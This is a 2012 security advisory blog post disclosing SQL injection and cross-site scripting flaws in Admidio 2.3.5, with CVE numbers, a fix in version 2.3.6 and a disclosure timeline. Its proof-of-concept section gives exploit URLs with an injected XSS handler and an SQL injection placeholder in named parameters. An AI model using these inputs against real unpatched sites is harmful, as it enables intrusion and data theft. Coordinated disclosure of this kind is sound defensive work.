Sep 1: SSCHADV2012-019 - Admidio 2.3.5 Multiple security vulnerabilities

Advisory:
Admidio 2.3.5 Multiple security vulnerabilities
Advisory ID:
SSCHADV2012-019
Author:
Stefan Schurtz
Affected Software:
Successfully tested on Admidio 2.3.5
Vendor URL:
Vendor Status:
fixed
CVE-ID:
CVE-2012-4748, CVE-2012-4749
 
======================
Vulnerability Description
======================
 
Admidio 2.3.5 is prone to XSS and SQLi vulnerabilities
 
==============
PoC-Exploit
==============

//SQLi (CVE-2012-4748)

http://[target]/admidio-2.3.5/adm_program/modules/lists/lists.php?active_role=[sql-injection]

//XSS (CVE-2012-4749)

http://[target]/admidio-2.3.5/adm_program/modules/guestbook/guestbook_new.php?headline=" onmouseover=alert(/xss/) "

=====
Solution
=====

Upgrade to the latest version 2.3.6

================
Disclosure Timeline
================

21-Aug-2012 – developer informed
21-Aug-2012 – feedback from developer
28-Aug-2012 – fixed in version 2.3.6

====
Credits
====

Vulnerabilities found and advisory written by Stefan Schurtz.

=======
References
=======
 
Geschrieben von Stefan Schurtz in Security Advisories Kommentare: (0) Trackbacks: (0)
Tags für diesen Artikel: , , , , ,
Zuletzt bearbeitet am 05.09.2012 08:53

Trackbacks
Trackback-URL für diesen Eintrag

Keine Trackbacks

Kommentare
Ansicht der Kommentare: (Linear | Verschachtelt)

Noch keine Kommentare


Kommentar schreiben


Um maschinelle und automatische Übertragung von Spamkommentaren zu verhindern, bitte die Zeichenfolge im dargestellten Bild in der Eingabemaske eintragen. Nur wenn die Zeichenfolge richtig eingegeben wurde, kann der Kommentar angenommen werden. Bitte beachten Sie, dass Ihr Browser Cookies unterstützen muss, um dieses Verfahren anzuwenden.
CAPTCHA 1CAPTCHA 2CAPTCHA 3CAPTCHA 4CAPTCHA 5


Textile-Formatierung erlaubt
Sie können [geshi lang=LANG][/lang] Tags verwenden um Quellcode abhängig von der gewählten Programmiersprache einzubinden